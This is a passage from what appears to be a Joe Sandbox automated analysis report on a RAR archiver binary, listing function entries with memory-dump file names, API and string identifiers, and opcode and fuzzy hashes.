                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                                                                                      • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                      • Instruction ID: bd618d4067f63364633bcae0cfc02c0d1049a71dd96974e7a20035ab595d9faa
                                                                                                                                                                      • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                      • Instruction Fuzzy Hash: DA41BB72A0AB5589E708DFA8E841BED77A4EB44388F805536EE5C17B54DE3CD0668360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A10140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                      • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                      • Instruction ID: 44c1c5e6649ef79ccb135c20196417cdaeea173f6bab1be38f31ac87cc61993a
                                                                                                                                                                      • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F819462A0D69285FB29AB19E5407BEB250EBC4B84FD94533DE4D46A99DF3CE4438330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79CC468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                                                                                                      • API String ID: 233258989-2277559157
                                                                                                                                                                      • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                      • Instruction ID: 9f6a3ab8f1b5b1dde2f342caaf62b542f8f7d1cb49304a2b48bc61767fb73ce7
                                                                                                                                                                      • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                      • Instruction Fuzzy Hash: 7202C023B0C58341EE68FA2592457FEEB51AB82788FC40437DA8E57786DE2CF4478721
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                      • String ID: rtmp%d
                                                                                                                                                                      • API String ID: 2308737092-3303766350
                                                                                                                                                                      • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                      • Instruction ID: b1c6eed6a3940c9a1491c0d403c58a0d2b7f4e3968c76542e46d6b558244cf31
                                                                                                                                                                      • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 73518E22A5D98785EB70BF25D8405FEA350BF94B88FC51033E90D5BA9ADE3CD606C320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                      • String ID: rar -ioff
                                                                                                                                                                      • API String ID: 4151682896-4089728129
                                                                                                                                                                      • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                      • Instruction ID: 3e36502e0e46b0633e9b42e7e5b00bc81ffc5d0141ba7623a7d2bbe87ec5de62
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                      • Instruction Fuzzy Hash: 68011229D19A16C2FB1CFFB9AA55D7DA352AFC5702FD44433D84E06590CE3DA04B8670
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                      • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                      • API String ID: 667068680-1824683568
                                                                                                                                                                      • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                      • Instruction ID: 822bcfec9d1751528595cc60a78cd7ac952671d6a51a4ce9f77ff999900e9e73
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 72F06D21A09B5681EA48AF59F94447AA361EFC9BC0BD85432DC0D07724EE2DE04AC320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79DE49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2092471728-0
                                                                                                                                                                      • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                      • Instruction ID: 4862c35113bec02527d788fd9cae6fc85a1c2bf041a97f41abc711027a3adb85
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D518733608B4286EB20DF25E48456EB7A5F785798FD4013AEA9D47B98DF3CD445CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0C254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2092733347-0
                                                                                                                                                                      • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                      • Instruction ID: 1e6f5acd3f156408dab35fc30680979140f11dcc942e5ea4474d3d546b6caf5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                      • Instruction Fuzzy Hash: 32315B62B146518AFB04DFF8D8805AD7771FB48B48B94502ADE0EA3A58EF38D496C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A1E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 3913153233-629598281
                                                                                                                                                                      • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                      • Instruction ID: 868db0f615ff2c3b04fc2898a1b609ec8877986c36ec5cdee274c98c6c6389de
                                                                                                                                                                      • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                      • Instruction Fuzzy Hash: AD61BE32A0D24286FB1CEB29E454E7DA791FB84B95FD4857ADE0A47744DE38EC428730
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C7188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                      • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                      • API String ID: 2522007465-2120454788
                                                                                                                                                                      • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                      • Instruction ID: 16c1d6d9af2b38d20c013899693bdf67e82915f6971386c2815badc99ac5cc6d
                                                                                                                                                                      • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                      • Instruction Fuzzy Hash: BE219F22A0D64381EA58BB59A945A7DE2A1FF80BC8FD44137FA5D43694DF2CE0478720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A224D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                      • Instruction ID: 4b5584d2708dfd32a62020c53cc98aa506ca27b0690c69cc0c216b5efb71d9fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                      • Instruction Fuzzy Hash: F1F04421A1964281EE4DAF99F490A7EA361EFC8780FC46037E94F46794DE3CD4468720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A2C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
